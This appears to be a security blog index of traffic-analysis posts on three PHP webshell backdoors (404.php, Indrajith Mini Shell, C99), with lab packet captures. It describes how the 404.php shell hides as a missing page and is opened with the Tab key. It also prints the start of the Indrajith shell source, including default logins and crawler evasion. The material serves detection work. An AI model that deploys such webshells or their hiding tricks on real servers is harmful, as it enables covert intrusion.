404 Not Found PHP webshell backdoor: traffic analysis, screenshots, reverse shell spawn and full PCAP file download

The 404.php webshell backdoor is a sneaky one: if an admin views the PHP page it looks as if the file is not there and is benign. The trick to logging into the shell is to press the Tab key; a small prompt then appears where you type the password to access the shell. Then we log in. Here is what the network traffic it generates looks like:

2017-01-20 02:34:21.437548 IP 192.168.1.102.53294 > 192.168.1.100.55555: Flags [P.], seq 703:1125, ack 1011, win 2049, length 422
E…..@…e….f…d…..w….{.P…….GET /404.php HTTP/1.1
Host: 192.168.1.100:55555
Connection: keep-alive
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 […]

Indrajith Mini Shell v.2.0 webshell backdoor: traffic analysis, Python reverse shell, pivot, netcat shell and PCAP file download

/*
 * Indrajith Mini Shell v.2.0 with additional features….
 * originally scripted by AJITH KP
 * (c) Under Gnu General Public Licence 3(c)
 * Team Open Fire and Indishell Family
 * TOF : Shritam Bhowmick, Null | Void, Alex, Ankit Sharma, John.
 * Indishell : ASHELL, D@rkwolf.
 * THA : THA RUDE [There is Nothing in Borders]
 * Love to : AMSTECK ARTS & SCIENCE COLLEGE, Kalliassery; Vishnu Nath KP, Sreeju, Sooraj, Computer Korner Friends.
 */
/*—————— LOGIN ——————-*/
$username="admin";
$password="password";
$email="blah@gmail.com";
/*—————— Login Data End ———-*/
@error_reporting(4);
/*—————— Anti Crawler ————*/
if(!empty($_SERVER['HTTP_USER_AGENT'])) {
    $userAgents = array("Google", "Slurp", "MSNBot", "ia_archiver", "Yandex", […]

C99 webshell backdoor (SpYshell v.KingDefacer): traffic analysis, PCAP file download and screenshots

C99 webshell usage, with the PCAP and screenshots of what it looks like; this has been one of the most commonly used webshells over the years.

2017-01-20 03:22:24.448614 IP 192.168.1.102.54057 > 192.168.1.100.55555: Flags [P.], seq 1:404, ack 1, win 2053, length 403
E…..@…Z|…f…d.)…..#.A..P…;…GET /c99.php?c99shcook[login]=0 HTTP/1.1
Host: 192.168.1.100:55555
Connection: keep-alive
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.87 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Encoding: gzip, deflate, sdch
Accept-Language: en-US,en;q=0.8

2017-01-20 03:22:24.448633 IP 192.168.1.100.55555 > 192.168.1.102.54057: Flags [.], ack 404, win 237, length 0
E..(/.@.@……d…f…).A….  .P….5..

2017-01-20 03:22:24.449057 IP 192.168.1.100.55555 > 192.168.1.102.54057: Flags [P.], seq 1:327, ack 404, win 237, […]